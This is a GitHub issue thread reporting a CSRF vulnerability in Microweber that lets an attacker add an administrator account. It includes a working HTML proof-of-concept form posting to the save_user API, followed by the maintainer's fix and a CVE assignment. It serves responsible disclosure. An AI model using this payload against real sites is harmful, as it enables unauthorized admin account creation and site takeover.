Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a CSRF vulnerability that can add the administrator account #484

Closed
AutismJH opened this issue Aug 31, 2018 · 9 comments
Closed

Comments

@AutismJH
Copy link

AutismJH commented Aug 31, 2018

After the administrator logged in, open the following page to add an administrator.
POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo1.microweber.com/api/save_user" method="POST">
      <input type="hidden" name="id" value="0" />
      <input type="hidden" name="thumbnail" value="" />
      <input type="hidden" name="username" value="3333" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="email" value="3333&#64;qq&#46;com" />
      <input type="hidden" name="first&#95;name" value="222" />
      <input type="hidden" name="last&#95;name" value="222" />
      <input type="hidden" name="is&#95;active" value="1" />
      <input type="hidden" name="is&#95;admin" value="1" />
      <input type="hidden" name="basic&#95;mode" value="1" />
      <input type="hidden" name="api&#95;key" value="15" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
@AutismJH
Copy link
Author

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf[1]) or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts.[2] There are many ways in which a malicious website can transmit such commands; specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests, for example, can all work without the user's interaction or even knowledge. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

@AutismJH
Copy link
Author

CSRF commonly has the following characteristics:

It involves sites that rely on a user's identity.
It exploits the site's trust in that identity.
It tricks the user's browser into sending HTTP requests to a target site.
It involves HTTP requests that have side effects.

@AutismJH
Copy link
Author

So it is effective

@peter-mw
Copy link
Member

i see your point, this is a valid issue, we will fix it soon

@AutismJH
Copy link
Author

It's my plesure,thank you!
You can fix it through that:1.Add token verification 2.Detecting the refer head 3.Add verification code

peter-mw added a commit that referenced this issue Aug 31, 2018
editing user now requires csrf token
@peter-mw
Copy link
Member

hi @731276192 i just added a patch to the issue.

please contact us from the website to add your name here on our list of contributors

@AutismJH
Copy link
Author

AutismJH commented Sep 1, 2018

Hello, you can use the name AutismJH. And can you apply for a CVE number for me? This is very useful for me now. I would be grateful if I could. thank you

@peter-mw
Copy link
Member

hi @AutismJH , here is the CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17104

the issue is now fixed and new zip is released , thank you for your report

@AutismJH
Copy link
Author

I have received the notice from CVE, thank you very much, this is very useful to me, thank you.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants